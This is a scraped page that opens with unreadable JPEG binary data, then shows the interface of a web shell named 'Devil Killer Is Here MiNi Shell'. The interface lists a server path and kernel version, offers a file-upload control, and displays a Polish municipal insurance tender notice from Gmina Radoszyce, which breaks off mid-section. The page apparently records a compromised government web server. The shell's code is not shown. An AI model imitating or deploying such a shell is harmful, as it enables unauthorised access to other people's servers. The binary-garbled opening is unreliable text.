JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230726/0032630601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługa ubezpieczenia interesów majątkowych oraz odpowiedzialności cywilnej jednostek organizacyjnych gminy Radoszyce” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radoszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radoszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@eadoszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radoszyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługa ubezpieczenia interesów majątkowych oraz odpowiedzialności cywilnej jednostek organizacyjnych gminy Radoszyce” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6f4cbc30-2b97-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00326306</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://radoszyce.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://radoszyce.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">załącznik nr 13 do SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy w Radoszycach, ul. Żeromskiego 28, 26-230 Radoszyce, tel. 41 373 50 83, fax. 41 373 50 84, mail: gmina@radoszyce.pl<br/>2) inspektorem ochrony danych osobowych w Gminie Radoszyce jest Pani/Pani Paulina Bojanowska, tel. 82 5611302, mail: inspektor@cbi24.pl <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Usługa ubezpieczenia interesów majątkowych oraz odpowiedzialności cywilnej jednostek organizacyjnych gminy Radoszyce ” Znak: BKŚ.271.16.2023<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych uwaga 1;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO uwaga 2;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>Uwaga 1: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>Uwaga 2: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BKŚ.271.16.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia – zadanie A – Ubezpieczenie mienia i Odpowiedzialności Cywilnej:<br/>-Ubezpieczenie odpowiedzialności cywilnej gminy w związku z posiadanym mieniem <br/>i prowadzoną działalnością;<br/>-Ubezpieczenie mienia od wszystkich ryzyk; <br/>-Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk;<br/>-Ubezpieczenie sprzętu i maszyn od wszystkich ryzyk.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 5,6 i 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Podniesienie sumy gwarancyjnej zakresu podstawowego ubezpieczenia odpowiedzialności cywilnej Gminy z 500 000 PLN do 1 000 000 PLN w przypadku gdy Zamawiający będzie mógł wygospodarować dodatkowe środki finansowe w bieżącym lub nowym roku budżetowym. Pozostałe informacje w załączniku nr 5 do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Obliczanie i ocena ofert część I zamówienia zadanie „A”<br/> Kryteria oceny ofert:<br/>A. Cena łączna ubezpieczenia – 80 %<br/>B. Fakultatywny zakres ubezpieczenia – 20 %<br/>Cena łączna ubezpieczenia – suma składek za wszystkie ubezpieczenia będące przedmiotem niniejszego postępowania (zakres podstawowy bez OPCJI)<br/>Oferty będą podlegały ocenie według następującego wzoru:<br/><br/> <br/> C min<br/> A = _________ x 80 % x 100<br/> Cb<br/> <br/>A - liczba punktów przyznana ofercie za spełnienie kryterium A <br/>Cmin – cena minimalna wśród złożonych ofert<br/>Cb - cena oferty badanej <br/>80 % - wskaźnik stały<br/><br/>Fakultatywny zakres ubezpieczenia – ocena kryterium polega na przyznaniu punktów za wprowadzenie do oferty dodatkowych klauzul fakultatywnych oraz zwiększenie limitów odpowiedzialności rozszerzających ochronę ubezpieczeniową według następującego wzoru:<br/><br/> Zb<br/> B = _______ x 20 % x 100<br/> Z max<br/>B - liczba punktów przyznana ofercie za spełnienie kryterium B <br/>Zb - liczba punktów oferty badanej<br/>Zmax - najwyższa liczba punktów pośród złożonych ofert <br/>20 % - wskaźnik stały<br/><br/>Ubezpieczenia OC<br/><br/>Dodatkowy fakultatywny zakres ochrony w ubezpieczeniu OC:<br/>•	Włączenie do zakresu ochrony dodatkowych kosztów mających na celu ograniczenie szkody w zakresie kontraktowej odpowiedzialności Zamawiającego związanej z dostawą wody pitnej odbiorcom indywidualnym i instytucjonalnym gdy wskutek awarii wodociągu lub skażenia magistrali przesyłowej lub ujęcia wody Zamawiający musi ponieść dodatkowe koszty związane z dowozem wody odbiorcom (koszt wynajmu cystern i transportu) oraz koszty związane z odkażaniem magistrali, przepompowni lub ujęcia – do kwoty 20 000 PLN na jedno i wszystkie zdarzenia ponad limit określony obligatoryjnie. Włączenie dodatkowych kosztów – 20 punktów, brak włączenia – 0 punktów.<br/>•	Odstąpienie od warunku w klauzuli środowiskowej by dla szkód rzeczowych i osobowych powstałych wskutek zatrucia środowiska naturalnego szkoda została ujawniona w ciągu 72 godzin od wystąpienia zdarzenia powodującego szkodę i zmiana zapisu na 7 dni robocze od wystąpienia zdarzenia. Przyjęcie zapisu w w/w wersji 20 punktów, brak przyjęcia zapisu – 0 punktów.<br/>•	Włączenie do zakresu ochrony ubezpieczenia OC czystych strat finansowych (szkód nie będących następstwem szkody osobowej lub rzeczowej ) dla reżimu odpowiedzialności deliktowej określonej w Kodeksie Cywilnym w art. 417 i 4171 do kwoty 50 000 PLN na jedno i wszystkie zdarzenia, ponad limit określony obligatoryjnie – 20 punktów, brak włączenia zapisu – 0 punktów. Franszyza redukcyjna w każdej szkodzie 10 % wartości szkody, nie mniej niż 1 000 PLN.<br/>•	Włączenie do zakresu ochrony ubezpieczenia OC czystych strat finansowych (szkód nie będących następstwem szkody osobowej lub rzeczowej ) dla reżimu odpowiedzialności kontraktowej oraz na podstawie prawa budowlanego do kwoty 100 000 PLN na jedno i wszystkie zdarzenia ponad limit określony fakultatywnie – 20 punktów, brak włączenia zapisu – 0 punktów. Franszyza redukcyjna w każdej szkodzie 10 % wartości szkody, nie mniej niż 1 000 PLN.<br/>•	Ochrona ubezpieczeniowa w mieniu osób trzecich - ochroną ubezpieczeniową objęte są szkody w mieniu osób trzecich będące następstwem zniszczenia lub uszkodzenia gotówki, dokumentów, zbiorów o charakterze archiwalnym, zabytkowym lub kolekcjonerskim z przyczyn innych niż awaria wodno-kanalizacyjne, CO lub innych instalacji. (Podlimit odpowiedzialności 50.000,- PLN na jedno i wszystkie zdarzenia). Włączenie do zakresu ochrony 10 punktów, brak włączenia 0 punktów.<br/> Pozostałe zapisy w SWZ dział III opis przedmiotu zamówienia pkt. r)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Fakultatywny zakres ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia – zadanie B - Ubezpieczenia komunikacyjne <br/>-Obowiązkowe Ubezpieczenie OC posiadaczy pojazdów mechanicznych <br/>-Ubezpieczenie AUTO CASCO - OPCJA<br/>-Ubezpieczenie NNW kierowcy i pasażerów <br/>-Ubezpieczenie pomocy w podróży ASSISTANCE.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 5, 6 i 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> UBEZPIECZENIE AUTO CASCO POJAZDÓW – OPCJA – do wykorzystania w przypadku zakupu lub otrzymania przez zamawiającego pojazdu pożarniczego lub osobowego (należy w formularzu ofertowym podać stawkę i składkę za ubezpieczenie 1 pojazdu pożarniczego – specjalnego oraz 1 osobowego ). <br/>Pozostałe zapisy załącznik nr 5 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert:<br/>Cena łączna ubezpieczenia – 80%<br/>Klauzule fakultatywne – 20 %<br/> <br/>Cena łączna ubezpieczenia – suma składek za wszystkie ubezpieczenia będące przedmiotem niniejszego przetargu dla zadania A. (zakres podstawowy bez OPCJI)<br/><br/>Oferty będą podlegały ocenie według następującego wzoru:<br/><br/> C min<br/> A = _________ x 80 % x 100<br/> Cb<br/> <br/><br/>A - liczba punktów przyznana ofercie za spełnienie kryterium cena <br/>Cmin – cena minimalna wśród złożonych ofert<br/>Cb - cena oferty badanej <br/>80 % - wskaźnik stały<br/><br/>Klauzule fakultatywne:<br/><br/> Z<br/> B = _______ x 20 % x 100<br/> Z max<br/><br/><br/> B - liczba punktów przyznana ofercie za spełnienie kryterium fakultatywny zakres ubezpieczenia <br/> Z - liczba punktów oferty badanej<br/>Zmax - najwyższa liczba punktów pośród złożonych ofert <br/>20 % - wskaźnik stały<br/><br/><br/>KRYTERIUM FAKULTATYWNY ZAKRES UBEZPIECZENIA:<br/> <br/>•	Stała, gwarantowana suma ubezpieczenia przez okres 12 miesięcy dla pojazdów używanych w ubezpieczeniu AUTO CASCO – przyjęcie zapisu – 30 punktów, brak przyjęcia zapisu – 0 punktów,<br/>•	Zastosowanie dodatkowej obniżki stawki za ubezpieczenie AUTO CASCO w przypadku zakupu przez Zamawiającego pojazdów fabrycznie nowych w okresie trwania umowy – dotyczy pierwszego roku ubezpieczenia. Za obniżenie stawki w stosunku do stawki z oferty o 10 % - 10 punków, 20 % - 20 punktów, 30 % - 30 punktów. Ubezpieczenie pojazdów fabrycznie nowych wg stawki z oferty – 0 punktów. <br/>•	Klauzula badań technicznych – zakres ochrony ubezpieczenia Auto Casco zostaje rozszerzony o szkody powstałe podczas kierowania pojazdem nieposiadającym ważnego badania technicznego, o ile stan techniczny pojazdu nie miał wpływu na powstanie szkody. Przyjęcie niniejszej klauzuli – 20 punktów, brak przyjęcia – 0 punktów. <br/>•	Bezskładkowe objęcie ochroną w ubezpieczeniu ASSISTANCE wszystkich pojazdów o dmc do 3,5 tony ubezpieczonych zarówno w OC p.p.m. jak i AUTO CASCO obejmujące min: koszty naprawy na miejscu wypad-ku/kolizji bez kosztu części, holowanie uszkodzonego pojazdu do warsztatu lub miejsca zamieszkania – do 150 km, pokrycie kosztów parkowania do czasu przeprowadzenia oględzin. Przyjęcie niniejszej klauzuli – 20 punk-tów, brak przyjęcia – 0 punktów. <br/><br/><br/>W celu wyboru najkorzystniejszej oferty w powiązaniu z przedstawionym wyżej kryterium Zamawiający będzie posługiwał się następującym wzorem:<br/><br/>W = A + B <br/><br/>W – wskaźnik oceny oferty – suma punktów za kryterium ”A” i „B”<br/>A - liczba punktów za kryterium cena<br/>B - liczba punktów za kryterium fakultatywny zakres ubezpieczenia <br/><br/>Zamówienie publiczne zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów za kryterium cena oraz dodatkowy fakultatywny zakres ubezpieczenia. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej oferty przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzule fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III zamówienia zadanie C – ubezpieczenie następstw nieszczęśliwych wypadków członków OSP oraz MDP<br/>-Ubezpieczenie NNW członków OSP w formie bezimiennej.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 5, 6 i 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający 